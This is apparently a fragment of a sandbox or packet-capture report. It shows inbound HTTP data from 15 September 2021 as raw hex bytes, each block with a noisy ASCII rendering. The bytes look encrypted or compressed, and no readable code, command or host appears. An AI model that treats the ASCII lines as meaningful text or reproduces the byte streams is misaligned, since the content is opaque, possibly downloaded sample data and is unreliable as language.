                                                                              2021-09-15 08:52:38 UTC80INData Raw: 53 08 ac b2 c6 4a 6c 43 91 7a 99 c5 f3 eb 84 3a d1 ec 40 32 f3 14 17 90 04 99 bd b6 f2 8c d8 6c 25 1f 9c 1c a9 8c de ff fd 6b 5c ab ce 27 bd 37 1d 09 9b 36 2c a6 ef b2 56 98 bc f6 33 8c 3a cf 88 da a3 32 b5 cb a4 06 b7 fa eb f3 a8 3e 5d d3 c6 47 77 1c e8 43 32 b5 35 42 a7 cc 33 5a 86 75 59 40 39 c0 9e ee 53 b9 08 98 08 25 9d 76 ee a3 13 b8 92 a3 b5 27 28 e8 a3 b3 2d f2 a7 5a 53 da 9b d8 36 47 5b 3f 47 ea c0 bf a9 dd 84 2d fe b5 cc 8a 17 ff b2 19 8a ef e4 bb 56 1b 98 08 ad b9 1b 2c 9d 0a fc fd 32 9f 70 4c c9 0c 48 5f 5b a4 49 2b 93 7f 64 c3 87 83 f2 cb a9 06 b0 27 21 d8 65 36 f5 d6 77 e8 b6 a1 3f b8 bc 1a 94 ac 69 35 2e 20 dd 8a a8 c7 d4 4b 38 87 f0 56 04 be 81 ec ca 66 fa 07 b3 a9 bc 75 6e 0a d2 2a a4 c1 08 bd 17 11 fb f2 87 8e b4 ca f1 24 db 8e 43 3d d6
                                                                              Data Ascii: SJlCz:@2l%k\'76,V3:2>]GwC25B3ZuY@9S%v'(-ZS6G[?G-V,2pLH_[I+d'!e6w?i5. K8Vfun*$C=
                                                                              2021-09-15 08:52:38 UTC81INData Raw: 52 5b ad e5 fb 56 d4 a0 f7 6b 24 fb e4 e5 d0 0b 7f ee 83 42 0e 0a 88 d9 29 45 4e 8a d8 0c 26 6e a9 b3 49 54 93 87 69 b7 c1 be 6d 12 37 82 67 33 f4 66 7c 54 22 32 92 a9 81 dd 88 a3 d0 d5 61 2a 40 9b 27 a7 46 af c6 9e 00 39 c3 f5 b6 7b 63 b6 91 8c e7 93 59 b9 14 60 88 b1 06 d0 84 70 d4 95 22 6d 1e c4 40 74 76 6e 3b e4 bd 99 73 65 ad cd 31 ee 65 b1 03 f7 60 76 18 59 03 df ca 7e 74 fa ac 14 52 82 fd 2d 8c 7d be 25 75 e0 ed d6 e0 11 4a f7 8f 9f 24 63 e9 95 b2 10 6e e8 e8 58 cf ac 98 fc 8d 3d 0b 0c 3e e5 ae a4 ce 1c 25 c7 1b 7b ec 3f b0 ef e3 1a 1e b4 32 1e 57 a9 64 54 01 b1 ba 01 a0 cf 71 04 1a 7e 45 6d 6f 2d 1a c9 9d 9a f2 c6 8d 35 0b 61 2c 2e 7e 78 fc 44 99 b5 28 68 13 e0 6e 43 e1 d4 f8 8f f9 5e 01 3b b1 43 f6 b7 11 37 b8 14 2f 59 1b 5c 72 de 5b 90 e0 88 b3
                                                                              Data Ascii: R[Vk$B)EN&nITim7g3f|T"2a*@'F9{cY`p"m@tvn;se1e`vY~tR-}%uJ$cnX=>%{?2WdTq~Emo-5a,.~xD(hnC^;C7/Y\r[
                                                                              2021-09-15 08:52:38 UTC82INData Raw: 64 11 7f 99 4a cc 06 a6 c3 51 55 ee 7a 79 d7 df c8 99 e0 b9 71 cb c1 40 ab 13 1c ee 8a 78 22 6b ea 69 7d 1c b4 82 1f 47 9e 56 d6 c2 b3 da c1 4c 23 4a f0 0f 8a 9a 07 00 48 dc bf e6 d6 7a 94 79 94 3c f3 14 55 80 0a 05 ac 0e 6e 21 bc 9f 1e 9c b2 f3 6b 8c 22 a1 8e fb 57 a0 3e a2 3d 8d 5e 91 08 77 67 dc 6e 73 36 a7 81 50 b8 21 c4 4e 8b 86 9d 01 2f a9 38 c4 f9 78 ff 2f 68 75 7a 8d 67 9d 85 8f 92 4e fb 82 43 19 8f 38 aa e4 0a 6a 0c 47 72 d3 b7 be 9b ad dc 3b 4f 4a 9e 00 3f 94 71 e4 5e 96 49 6e 0e e9 e4 32 9e 61 da ab a9 7a 5c 84 70 d4 c0 32 5b af 0d 40 00 78 e3 25 96 07 39 16 ff 8e cd 31 9c ab 14 74 52 c5 ff b2 52 60 23 e7 7e 74 88 62 d9 49 63 4c c5 15 90 18 32 17 51 ca c1 19 2c ef 51 52 3b d9 52 0c a4 5d da 3b 95 85 77 cf ad 98 cd 82 e9 e3 07 28 8a 51 df f1 e4
                                                                              Data Ascii: dJQUzyq@x"ki}GVL#JHzy<Un!k"W>=^wgns6P!N/8x/huzgNC8jGr;OJ?q^In2az\p2[@x%91tRR`#~tbIcL2Q,QR;R];w(Q
                                                                              2021-09-15 08:52:38 UTC83INData Raw: 01 8a 29 08 8b ef 19 21 dc 94 36 7e f5 e3 04 a6 e7 4d 5b b4 22 37 2d a6 8c 2c 34 0e 3a 3f f5 8e 20 65 4d eb ad 8f aa 6a ca ce c5 a3 76 1f e5 fc da 13 a9 e7 ac cb c4 2e 8b 28 f9 8d 55 1d 82 22 cd b9 47 ea b4 71 20 c9 7f 5d 06 b5 08 44 8e 8c c2 ba 74 64 f1 20 a0 82 70 b9 bc 1e 0c 81 b2 be 86 4c 3d 9e ac 35 36 f3 f4 cd 1d 98 9d 1f e5 80 73 ea ee a0 e5 de 18 81 b0 53 4b bc 15 4c 7e a4 0d 2f c0 0b 3c b8 e4 e9 95 ac 69 3d 62 22 dd 8a a8 87 28 73 6d 35 48 8d b4 a0 75 e5 ca 1d 50 08 ba 38 cd 8a 91 78 e6 32 e8 7f f7 bd 52 1d 76 aa 4d 8e c0 c4 14 eb d9 8e ec 3d 16 84 38 65 cc dc 81 e6 d8 a8 ab 2d e2 3a 04 05 c2 3c e7 87 42 e3 bb 99 12 4f 56 02 c1 da 4b 7a 00 d9 5f 66 05 a0 e6 17 ba db 39 21 62 68 94 36 cb 53 f8 3a 54 b8 0c f8 af 3d db aa e7 13 1d bd 6f b5 0c 44 98
                                                                              Data Ascii: )!6~M["7-,4:? eMjv.(U"Gq ]Dtd pL=56sSKL~/<i=b"(sm5HuP8x2RvM=8e-:<BOVKz_f9!bh6S:T=oD
                                                                              2021-09-15 08:52:38 UTC84INData Raw: 53 6f 75 f1 00 b2 d1 f8 d5 b1 a5 89 3b 8e 12 59 8d 61 8e 60 47 74 d3 43 3a 75 b3 5f 8b b3 0a fb e5 a6 aa d2 4c 0b 2a 35 b9 a1 79 f0 27 97 09 1a 00 f4 cd 29 24 2d 48 d1 33 6c 41 44 27 00 01 63 37 c1 86 ab 6e 30 63 eb 41 7f e0 03 99 3b 4e 06 52 8c 08 74 1d ac 91 9a e4 19 bd ae 98 b9 4e a8 83 f1 29 8a 27 ce a1 6c 9f c4 7a 96 b5 3c b0 d3 83 81 76 b7 32 0a 3e b7 03 f2 75 ab 6e 97 c8 13 bf 14 a4 fb ec ed 33 ee a5 36 74 d0 6a 5f fb ea c7 a4 9d 8c da 31 8e 84 a7 13 41 68 13 d0 8b be 22 2d 00 05 51 84 1a 4d 54 57 f1 bc 5f 39 dc 6a fd 42 68 01 38 9e 98 a3 61 4b 1a d7 af a6 65 3f 27 b7 cb e1 ee e8 b8 73 84 76 ee 7d aa dc e0 41 e0 37 3e 6d 46 21 85 0a d5 c9 ba 2e 7c eb b2 6d 8b 35 07 aa 31 1e 61 23 ac 87 78 2b f1 1f 96 36 52 2b ab 21 6c 9a b2 19 ce c6 26 91 59 50 da
                                                                              Data Ascii: Sou;Ya`GtC:u_L*5y')$-H3lAD'c7n0cA;NRtN)'lz<v2>un36tj_1Ah"-QMTW_9jBh8aKe?'sv}A7>mF!.|m51a#x+6R+!l&YP
                                                                              2021-09-15 08:52:38 UTC86INData Raw: b9 a3 a9 d2 18 35 99 90 ef 38 d3 32 75 1c b0 8b b8 17 80 08 36 ff 00 70 20 87 b2 d6 30 63 25 db 9a b6 ef 0d 3b 5b 4a 69 e1 7e 6b 5f 84 56 d2 4e b1 35 f9 4f 64 b3 78 d0 68 7e b5 8e b0 dd 8f ec 26 a3 d4 d0 27 a0 eb c3 88 74 e8 23 50 08 fd fd 54 c0 c9 46 d8 08 12 f5 47 a5 75 8b e1 5f 38 69 ed 87 42 46 51 37 f0 ab 94 73 4a dc 16 a9 a7 32 80 37 c5 f0 6f a9 4e 0a 2d 9b 1d 22 bc 15 d1 bf 84 a5 b0 2b 78 b9 f2 a7 83 c6 7f e9 29 d8 ca 94 8a c6 d3 33 c4 42 ce f4 70 be 27 71 f3 b5 37 90 d5 c7 ef cc 8b 43 47 27 33 04 73 26 f6 37 fc c5 f5 2d 3b ec 8e 39 61 e6 f9 ee 65 e8 33 ce e3 54 b9 d2 17 e2 86 3d 27 a5 96 30 4a 71 cb c1 cd bb 6c a0 50 0f c1 c1 eb 5f a2 6f 90 40 4b 85 31 35 ec 3f 8f 59 a4 80 7f 68 45 51 be f9 24 e8 97 19 d4 16 6d 40 67 da 34 95 3d e7 67 4d ab 69 a1
                                                                              Data Ascii: 582u6p 0c%;[Ji~k_VN5Odxh~&'t#PTFGu_8iBFQ7sJ27oN-"+x)3Bp'q7CG'3s&7-;9ae3T='0JqlP_o@K15?YhEQ$m@g4=gMi
                                                                              2021-09-15 08:52:38 UTC87INData Raw: c8 96 ad 71 87 cf 04 ee e4 36 6b 07 c7 95 a8 0f 3a b1 f2 e6 61 47 43 87 68 77 41 b9 29 27 9e 98 a5 a1 93 0f a4 a5 d3 df 40 4a b2 13 e1 ee ff 08 a6 87 76 41 b4 1e 3b e0 41 e6 b2 e5 40 32 06 c0 7b 2d a1 92 8c 0b 07 c1 17 9c 5d dc a8 43 b7 c0 1f 80 7b 87 d4 f1 84 87 36 52 5f 9b 95 6c 9a b2 21 6b 09 7b 6c ce 9f 29 aa 54 cc cc ee 84 1a 01 a1 c0 de ac 32 68 ae b0 a7 cb f1 c6 ae f3 c5 66 14 0e 05 41 c0 59 73 e2 ad e0 c5 ad a7 2a d1 58 46 9d 44 74 92 d9 10 ca f2 01 e8 b9 e7 e6 a4 ad 61 da 42 f7 5a d1 75 52 75 76 af 4e fe 89 2d 33 19 be 82 a9 1e 8f 83 15 77 5b 72 0e c6 b3 9f 57 4a 83 6a a6 44 11 a7 93 43 f2 5d 20 37 5f be 49 c9 36 0e 2d bd 7f 95 21 11 53 2e 48 8d aa 2d 32 04 01 b3 63 12 ed bb 55 c2 28 e8 a3 e6 35 c6 a3 4e 52 ae 55 dd 76 37 21 bc e2 fd 9b a0 03 de
                                                                              Data Ascii: q6k:aGChwA)'@JvA;A@2{-]C{6R_l!k{l)T2hfAYs*XFDtaBZuRuvN-3w[rWJjDC] 7_I6-!S.H-2cU(5NRUv7!
                                                                              2021-09-15 08:52:38 UTC88INData Raw: 15 8f 41 77 a0 76 1a cc 00 2a 22 38 13 62 29 47 40 db 79 93 f2 09 92 69 5f 0e b6 c4 d2 66 5c 81 08 06 65 e0 44 c8 72 1c d3 eb 5e e9 7b 0d 84 aa 47 62 97 b5 8e 23 68 28 10 18 c7 f6 3b 6f 56 c1 aa e1 6f f4 3f 22 09 dc 0b ec c5 84 26 e5 7c b3 57 77 4c bb dc ad 92 ff 48 1c bf 96 7c 71 2c 58 fe 22 f7 60 ef d0 b2 3d 13 f1 79 8d 6e 14 c7 9a 72 f7 1b 26 29 a1 1e e6 57 a0 3e 37 54 e0 1f 94 08 77 0b 40 fe 82 42 ef 8f e1 b7 36 44 e1 f8 ec ac 6f d0 56 80 bd e7 c9 af 7e b1 5b c4 72 61 4d a5 cc 41 8e ea 0f 2e 09 42 38 aa e2 98 33 b5 2c 5e ec 1e 3e bb 26 d3 d8 fa a1 24 ff 4d 89 45 9a 82 68 b6 e5 63 3f e5 33 9e 02 2e 96 ee a5 e8 15 fd da 49 31 4c c6 d3 b7 1a 0d 49 4e 8e 9e 32 01 1f c1 31 ce 11 6e bd 17 dc 28 8b 18 59 3d ba e5 7f 74 6d 4b 5d 83 36 31 a8 0f 93 19 32 26 11
                                                                              Data Ascii: Awv*"8b)G@yi_f\eDr^{Gb#h(;oVo?"&|WwLH|q,X"`=ynr&)W>7Tw@B6DoV~[raMA.B83,^>&$MEhc?3.I1LIN21n(Y=tmK]612&
                                                                              2021-09-15 08:52:38 UTC89INData Raw: 10 ec 41 41 11 59 d3 36 2b 24 01 e5 5f a1 5a 2f 6d 10 c0 ea be 16 4b 0b cc e6 3a 6a dd 52 02 f9 fe 75 5b 99 b7 12 e6 8c 10 ad ac f5 09 6f 92 3c 3a 92 0b 2a b3 86 d0 51 fe e5 f6 f1 d2 55 d5 77 df ee d8 82 50 7d 55 d8 62 89 84 a7 9e ed 12 0f 25 9c 69 e8 28 b3 c5 26 8b a5 ac 79 de 71 66 c7 de 49 b8 15 3f 34 fc 29 6c 7b f9 47 33 0b 9a 8e 4d ec 75 64 f1 ab e5 0f 13 6f 3c 25 4f 59 3c c6 d1 1e 67 ae 6e c4 05 33 e2 96 c1 48 49 2b 7c 80 bc 05 22 5c 65 78 71 3f 4f b0 8e d5 a9 b3 69 dd 79 e9 c2 a4 2b 96 54 e3 94 d8 3a 35 1f 1f 11 bc 99 92 f0 f8 79 6f 86 8f a2 a9 af 5f f5 d9 90 07 3e b1 89 4a c1 0a a0 68 15 e8 08 36 07 f9 15 9b b0 fa 6a 83 69 11 cc 8f ec 3d 06 dc 38 3d 27 dd 81 e0 18 38 dd 14 f5 d9 9b 07 d5 57 12 22 e4 31 4a 3c ff d8 98 d2 c5 26 2e 91 44 cf 13 35 6e
                                                                              Data Ascii: AAY6+$_Z/mK:jRu[o<:*QUwP}Ub%i(&yqfI?4)l{G3Mudo<%OY<gn3HI+|"\exq?Oiy+T:5yo_>Jh6ji=8='8W"1J<&.D5n
                                                                              2021-09-15 08:52:38 UTC91INData Raw: cd a7 1d 08 b6 b8 f1 54 e8 7d 38 3b 84 ba 82 ab 56 fc cf de 29 b3 01 18 97 46 df 24 ec 34 53 69 af f6 4e 8b 24 b6 a4 ae 65 59 b2 13 36 e9 62 cc cc 61 ea 14 32 18 d1 23 39 fb 1b 2d c2 38 6c 33 84 bd 0b c3 8d 90 07 3d 01 d0 f4 7e 3e 9a bb 1c 4f 16 dd 9c 3e 58 77 ad 6b 70 06 40 cb 8a 97 3e 37 7f fb e2 b2 77 b8 ad 16 28 d3 d1 f8 00 03 05 52 8c f4 0d e1 d1 0c 24 6d e4 bd 31 26 46 4c 78 ff b6 d3 75 ae 5b d9 15 b6 c5 0c e8 54 4a 0a d8 f5 24 67 07 25 7e e2 da 17 06 62 f4 3e 3c cf 65 8f 00 a4 fb f4 8e 9b 1e d0 9b 05 e8 96 18 20 ac f0 65 c8 e4 d7 1e 1a 7a 3c 13 04 e8 f2 7c 64 aa da 1e bd b8 aa 80 f2 c5 4e 40 4f 3c 2c 43 f3 d2 0a ed 5a 58 7a 54 d8 d4 bf f7 4a 53 d7 15 7a 3f f7 eb 74 f6 d2 fe 42 79 23 02 eb 3c f9 2b 55 a9 08 e2 3f 42 46 bc 8e f4 68 a9 19 24 c1 2c 7b
                                                                              Data Ascii: T}8;V)F$4SiN$eY6ba2#9-8l3=~>O>Xwkp@>7w(R$m1&FLxu[TJ$g%~b><e ez<|dN@O<,CZXzTJSz?tBy#<+U?BFh$,{
                                                                              2021-09-15 08:52:38 UTC92INData Raw: 4c 19 a1 bc e5 be c0 cc 53 c1 62 67 b3 bb 23 a5 1d 6b 53 1d 47 a5 20 20 75 23 d2 d0 d3 79 87 84 bb a3 a9 6a 1a 35 99 9d 0d 3e 3c 9f 0b 55 0d 8d fd ea 0b d2 5e 13 f8 9e de f5 25 1b 4b d3 8b cc 92 f4 4e ac eb 13 24 e0 9b 7b 6a 4d 84 be 4f cd 4f be 78 ee 6c d3 78 bd 33 ed 25 ba 3b 45 0e 40 f6 5d 2b 07 74 f6 bc a3 5a 92 7d 91 ae 83 02 03 c1 71 37 cb 27 e6 ea 9a 87 a6 1d 9d 86 72 38 7b 12 d2 26 93 71 e9 b5 07 c4 7c 62 1c e2 77 e6 32 0b 37 3a 22 e4 59 00 d3 db e7 78 66 31 48 09 f8 84 a4 b0 27 f5 3c 2a 05 7c 4a 2f f0 70 b1 7d f9 da 4d 63 81 85 42 45 ee 8f 6e d8 1a 7e 73 e7 01 2a 56 62 3f 53 d4 b8 bf 8a 58 72 0c f6 f1 e1 63 0b b6 b0 0f 5e c7 9e 09 74 7b b1 4a cc 72 0b 3b 45 42 e8 7b 33 80 d9 3d 69 04 da 16 8a c1 46 29 5d 4f 63 cf 94 41 c3 c2 1d 90 77 7c 7f af cd
                                                                              Data Ascii: LSbg#kSG u#yj5><U^%KN${jMOOxlx3%;E@]+tZ}q7'r8{&q|bw27:"Yxf1H'<*|J/p}McBEn~s*Vb?SXrc^t{Jr;EB{3=iF)]OcAw|
                                                                              2021-09-15 08:52:38 UTC93INData Raw: 63 a7 84 49 ee e3 c2 30 9a 12 39 e5 40 ef fa fd 9b 1e 61 11 de 30 5d fb ea 81 cc a0 2c 53 39 cf 0f 00 56 72 0c 9a f0 ee 58 16 6b 07 26 11 6c ce 26 b0 57 f1 d9 5f f9 dc 7f e0 4b 2e e2 8d aa 3c 40 90 df b3 5b 32 fc f6 f5 a2 98 f5 a4 15 00 bd 86 92 00 72 22 8d 04 a0 a9 79 d4 3f 42 32 ca 12 eb 40 e0 92 0c 99 87 7e e8 9c 0b 42 56 bc 48 4d 72 c2 4a 86 d4 73 ac 8a 3b 4f 2a e1 30 d4 c5 a5 26 0c 73 98 1a 64 c0 1b 05 e9 14 07 9b 2e dd 29 5c 72 79 37 30 fd da 32 34 75 ab a3 c8 c6 80 9f eb 09 6f a9 a2 d4 7d 4d 99 d9 28 56 a5 90 49 0d ef 53 33 8b 6d 54 d5 e2 31 94 df b8 93 2e 11 81 d0 35 bc 08 d9 c1 ce e3 d3 02 67 fb c2 a3 a8 04 18 c5 cf 98 8a b8 02 01 8a a4 65 13 dd 18 21 da 84 3e 2c 4c 17 fa 59 84 63 af b7 22 45 e5 c3 76 d3 cb f1 d2 bd 5f be 21 11 55 ee a8 ca 57 d2
                                                                              Data Ascii: cI09@a0],S9VrXk&l&W_K.<@[2r"y?B2@~BVHMrJs;O*0&sd.)\ry7024uo}M(VIS3mT1.5ge!>,LYc"Ev_!UW
                                                                              2021-09-15 08:52:38 UTC95INData Raw: d3 1e 9a 1d 20 d6 15 39 03 5a 5b 4f ac a0 d3 f2 13 e1 6b 81 65 a2 4e 41 bf 72 bc 58 76 38 12 9d 06 3a 60 d9 d2 78 0e 60 a9 3d c8 31 54 74 42 67 40 ff 58 f8 49 e2 49 77 f6 01 19 68 01 cb c1 31 7d bc 12 35 de 33 e7 e3 6d 51 a5 c9 7a 79 d9 62 2a 7e 11 92 8f 34 91 a7 11 8d 4c 9c da b0 62 7f 12 6e 2a 18 ef 11 e1 ef ea 06 2a b0 d2 e5 0d d9 d8 e0 f7 18 16 e8 f4 17 12 64 a8 92 44 0b 2c 2a 94 3d 0d 9f 10 68 b4 36 ec 1d 21 e4 7c 66 85 45 08 e8 1f 7c 73 ec be 5b f7 98 30 83 26 9a 04 6e f7 88 e3 db 9e 14 42 9b f5 01 4c c9 bb 3c 30 69 fd 11 43 56 c7 b6 31 0d ff 69 b7 b5 6b 00 69 b8 82 c8 41 21 31 c7 43 8d 32 82 b9 39 b0 9f 7c e4 1f ec 9c bf e9 9d ac 03 e4 30 37 50 39 d1 52 0e 6d 1b 0c 8a b6 6c 5b 24 31 15 8a 5f db 1b 63 4e 35 bb c5 22 9c e4 c5 40 74 3b 3d 80 93 c9 9c
                                                                              Data Ascii: 9Z[OkeNArXv8:`x`=1TtBg@XIIwh1}53mQzyb*~4Lbn**dD,*=h6!|fE|s[0&nBL<0iCV1ikiA!1C29|07P9Rml[$1_cN5"@t;=
                                                                              2021-09-15 08:52:38 UTC96INData Raw: 7e a7 5c 9b 58 cc 66 52 a5 9d 48 6f a9 43 c5 7d 4d 44 74 70 34 59 6f c2 fd 82 6b 88 3f a1 19 19 67 2d 9a 27 46 6c a3 bc 26 c5 cf 43 83 01 91 3f 2c 2d fd 02 e9 b9 b5 f6 45 a3 ce 85 de 53 02 06 01 01 e1 75 3e 51 e2 b4 57 4c 93 62 1e 44 90 59 06 c9 ec 0c 21 20 35 f0 32 2e 9b 0e 04 d0 15 04 d9 65 9d 5f db 08 4d e1 a2 d3 dd fa fa 64 02 6a 00 e0 28 e8 a5 f6 39 c6 4c 1b 52 ae 1d b1 3b 73 20 bc 53 e5 b4 f3 a3 7f 37 f0 1c 17 f0 01 9a c7 23 95 24 11 94 d9 9c 05 d9 83 bf 85 9d 79 0b 85 6a b9 56 7e 89 34 36 bf c1 bf eb 04 0a 05 2a 7b 8c 61 ab 7c 0d 40 2c 7d 4f d8 de a0 f8 f3 81 2d e0 63 49 84 4e 10 a5 48 e0 bf 61 7c aa 8c 74 22 10 1b 79 b5 89 0e 36 b0 d5 03 90 93 70 65 1b 42 c2 d4 35 48 6f 0a 40 c2 40 e8 eb 41 56 f9 fa 21 48 15 b6 6f 0a 9e dc 99 54 0e ad 9f e3 74 8a
                                                                              Data Ascii: ~\XfRHoC}MDtp4Yok?g-'Fl&C?,-ESu>QWLbDY! 52.e_Mdj(9LR;s S7#$yjV~46*{a|@,}O-cINHa|t"y6peB5Ho@@AV!HoTt
                                                                              2021-09-15 08:52:38 UTC97INData Raw: 04 24 da 8d 1d 26 9a 41 63 f7 88 e3 f4 9d c1 43 9b 81 90 74 33 44 4e f8 fc 48 6e d0 56 d0 e4 7e 76 50 69 fd 76 c1 72 13 43 38 27 56 d6 06 7c 54 50 2c f3 af 96 b0 62 34 d6 a1 13 09 0b 50 22 d3 ac 07 1d a2 41 b2 5c 28 6e a7 69 b6 e5 b3 f7 f6 b7 a3 14 60 88 a5 6a 99 3a 8f d2 10 8a 49 c6 c4 05 fb f3 b6 c5 f3 17 0a 00 1f f2 a6 8e eb 11 1b 72 5a c5 9c ac 1a 76 ad 74 80 00 40 d7 e9 97 8a 42 d2 57 e2 a3 3d 74 b0 ac d7 2c 81 46 51 c3 bf 66 32 81 6c cc bd 86 f5 d4 72 ce de 22 a2 2f b5 b2 f2 29 f8 2b 1f cb 6e 9f 08 3a b9 15 c5 4f 2c e2 66 47 b4 32 9f b7 4a a7 0b 8a 54 6a 47 74 60 05 17 79 e8 ef 10 86 dd 1a c9 72 bd 4f 37 40 ef 0b 9b 45 a1 db f3 04 6c fc 56 8f f3 17 b5 ea 60 8f 71 10 b4 ab 7a 0d 40 95 d7 be bc 2d a9 2c 5c 43 bd 5c 58 9e 8f 13 7d d8 0b 8e 26 1b 58 72
                                                                              Data Ascii: $&AcCt3DNHnV~vPivrC8'V|TP,b4P"A\(ni`j:IrZvt@BW=t,FQf2lr"/)+n:O,fG2JTjGt`yrO7@ElV`qz@-,\C\X}&Xr
                                                                              2021-09-15 08:52:38 UTC98INData Raw: e3 ba c0 17 b2 ec 44 9e c1 7a df 62 3e 7e b9 f1 8f 34 4a 88 16 0f 81 d8 31 6b 22 7b e6 0b aa 4f 41 84 6c 05 51 e2 c5 84 a0 25 d5 24 3a 9d 49 e7 f9 52 c8 9b 4c b9 d4 10 77 8e 09 d8 e6 87 f8 25 bc ea a3 61 ba 6b 26 5b 83 66 7d b9 1f ed 56 27 29 c4 5e c8 22 0a 49 0f 5e d2 05 90 31 cd 58 1c 96 39 6d de b6 87 0d c9 53 c7 c2 87 8b 19 6a 79 d0 93 07 76 50 c6 a0 36 eb 73 13 43 a5 b2 65 04 aa 0f ee 0d 51 01 ee 97 b0 da b4 8f 8e 12 09 35 bc 55 69 83 87 c3 64 fe 4d 52 6d 52 0d c5 a1 32 36 19 e1 45 24 1a 12 32 c0 b2 c2 7e 8e a0 16 0a a9 69 68 57 b8 23 48 3a 92 07 25 73 a5 a9 db 42 aa 10 1b 7c df 1e 24 b4 4e ba 82 e0 7f 02 40 cf 8c 87 e6 54 5a bc 91 19 4e 5c 28 42 7a 3b cc c0 50 29 72 e8 97 0c a4 59 b9 0c de 93 73 b2 93 34 16 94 d5 03 dc 28 8a 27 1e d1 1c 25 eb 1b 4e
                                                                              Data Ascii: Dzb>~4J1k"{OAlQ%$:IRLw%ak&[f}V')^"I^1X9mSjyvP6sCeQ5UidMRmR26E$2~ihW#H:%sB|$N@TZN\(Bz;P)rYs4('%N
                                                                              2021-09-15 08:52:38 UTC99INData Raw: b7 12 e6 21 a8 3e 29 38 4e 17 fa 2e 05 a6 0e 27 b8 bc 8e 57 a0 bd cb b8 bc 21 b0 03 b1 8b ac e4 20 15 3b 93 62 c0 ea d7 fb 9f 7c 67 51 d5 06 86 46 d6 a6 5a ca a5 e4 25 aa 28 29 ba bb 2d ea 70 4e 41 99 52 18 3a f9 02 47 75 ea c2 29 82 27 01 80 de 80 29 ec cb da 80 97 6f 18 86 42 97 7a 66 91 44 65 96 d9 9a b9 70 79 5e 7d 0c f8 20 ab 35 63 34 49 0c 21 bd aa da 8d d2 e5 6f e1 7b 58 f4 8a 3e d1 78 19 3d 87 cc 19 b3 4d 06 46 9a 91 96 1d eb 1e 44 15 38 1c 7f 47 f7 f5 73 7d 4e ad e9 fa a0 01 6e 54 80 41 58 63 9c ec b0 1d 05 6c 2a f5 94 54 05 7a df 3d 21 d0 af 34 dd 81 94 b2 80 56 d2 1d 9f 23 90 5e 64 d2 78 bd 97 d1 4a 10 b6 a9 8f 84 6e cc a7 8c 1d 80 eb 90 c5 74 92 2c 3c 10 9c a5 60 8f f9 14 f0 0e 7d c4 37 92 01 83 83 5f 5d 24 cd af 11 53 14 44 c6 f1 a4 74 71 9d
                                                                              Data Ascii: !>)8N.'W! ;b|gQFZ%()-pNAR:Gu)')oBzfDepy^} 5c4I!o{X>x=MFD8Gs}NnTAXcl*Tz=!4V#^dxJnt,<`}7_]$SDtq
                                                                              2021-09-15 08:52:38 UTC100INData Raw: e0 08 e5 34 1f 5d 7e 41 de 18 18 93 89 81 53 9f 77 18 5a e8 90 d8 b7 65 2f 4c c6 b6 fa 0f a3 85 0c 90 17 29 75 a5 8d db 41 e4 11 1b 72 5a c5 cd e7 a6 80 52 95 d5 23 ed e8 e4 3d c9 37 68 f7 87 65 62 62 eb 2f 39 f4 d1 10 a1 5a bf a3 73 81 6a cc a1 d4 25 f4 cd 31 bb d0 f6 39 c2 04 88 e7 7b ae 5b bc 14 dc c5 0c fc 45 78 1f b5 4b 14 61 1f 3d 4d d7 bb e6 0f 62 f0 0b 3c cf 11 7f 54 d7 41 ef 88 9b ca b3 9f 18 9b 3d 2f 81 ad 0a 9b 37 b4 86 14 56 c5 c3 67 24 fc 22 8c 9f aa da 7d 85 a0 ee 7b 79 40 f6 56 f1 15 5f e9 a0 7f 8d 5f 2f e2 ff 92 4c a3 61 6f 4a d3 c3 19 9a 5c 2d e2 c8 e1 9c 85 0d 78 85 76 ee 65 e6 f7 e0 41 e0 62 31 05 69 60 3b 7f c5 e7 7e 9a c2 60 ba 58 e9 37 07 d8 29 fc b3 65 57 6e 8d cb e7 52 e9 4d 19 2a e1 42 79 a7 b5 8f 19 07 22 49 d9 c2 9d 39 fe be 0c
                                                                              Data Ascii: 4]~ASwZe/L)uArZR#=7hebb/9Zsj%19{[ExKa=Mb<TA=/7Vg$"}{y@V__/LaoJ\-xveAb1i`;~`X7)eWnRM*By"I9
                                                                              2021-09-15 08:52:38 UTC102INData Raw: e5 ca 12 c5 a7 d6 a1 7c 74 6e 7e f6 7e eb 7f f7 bb 82 79 60 21 87 99 e3 a4 7f 24 af e4 93 4e ac 9f 5d ea 94 ca 0c c1 b3 7b db 57 65 4f be 06 a1 31 02 f3 ef 74 c6 d8 5f 4e 56 04 01 5e 5d 2b 07 77 2d 6e e4 76 e4 17 ce 05 ac 76 d8 44 49 9c 84 26 92 99 2c 33 0d 8a 15 09 f9 db e1 12 b2 c9 5f 81 ef b0 cb 2e 12 d4 fc 16 2c 2a 99 7e c8 ca 66 af f9 c5 13 fd 10 5d 38 06 11 4f d1 84 4d c9 8c 86 46 fd 6f 43 e5 15 9b a4 3b a6 04 75 13 58 7e 64 f8 de 70 31 be cf 4d 59 08 c8 74 40 c5 11 55 74 a7 c2 30 cd a7 8c e4 0d b6 02 4c 7e cc 4b 74 71 c6 31 7b 7c 86 9b 4b cc 06 b6 eb 32 ee 1b 6c 65 fb d9 3d 1d e9 22 8f 34 3e 9d 63 62 2c 9d 30 6b 10 d6 8f a2 6f 7f ea e7 09 a5 bf ed c5 f0 06 85 7e b3 57 92 8d 83 63 52 07 17 7d 36 a9 92 08 0b 18 2b 94 3d 56 c6 f8 13 53 9e ad 72 57 a1
                                                                              Data Ascii: |tn~~y`!$N]{WeO1t_NV^]+w-nvvDI&,3_.,*~f]8OMFoC;uX~dp1MYt@Ut0L~Ktq1{|K2le="4>cb,0ko~WcR}6+=VSrW
                                                                              2021-09-15 08:52:38 UTC103INData Raw: a9 64 0f 8d 6e 16 68 07 b3 9d 11 22 38 b1 57 e6 cd 04 42 87 68 b7 6d 2c e2 8d b7 58 b6 75 b3 7f ce 9e a5 65 4b 29 56 ca f6 1f d6 43 79 85 3c 7a 21 8d 91 c9 81 f5 76 c1 30 48 45 87 80 d2 49 36 8f c3 14 b4 6d ab 35 07 aa 31 dd 8d 67 57 79 90 cc cc 53 9d 37 18 14 e3 42 6e e8 08 99 5c 9b 67 91 31 88 60 63 ff 72 a4 a9 4f af e9 a7 7b 93 12 b9 12 82 25 84 aa ea 2e 72 13 d2 f1 03 97 2e 41 ec 4c 30 f3 14 63 a0 84 7b 0e 08 0d 6f 15 65 34 92 b1 68 bc 98 22 b6 16 df e2 54 ba 5a 59 60 96 98 29 fa a9 95 00 15 41 fe 69 d8 32 19 c5 f7 65 af fd f9 69 82 3b cc b7 b3 b6 6d 16 c1 29 a6 26 cb 64 18 6c a0 ef d0 9c c8 c8 2b 53 90 cb 50 82 e6 94 71 20 de b0 77 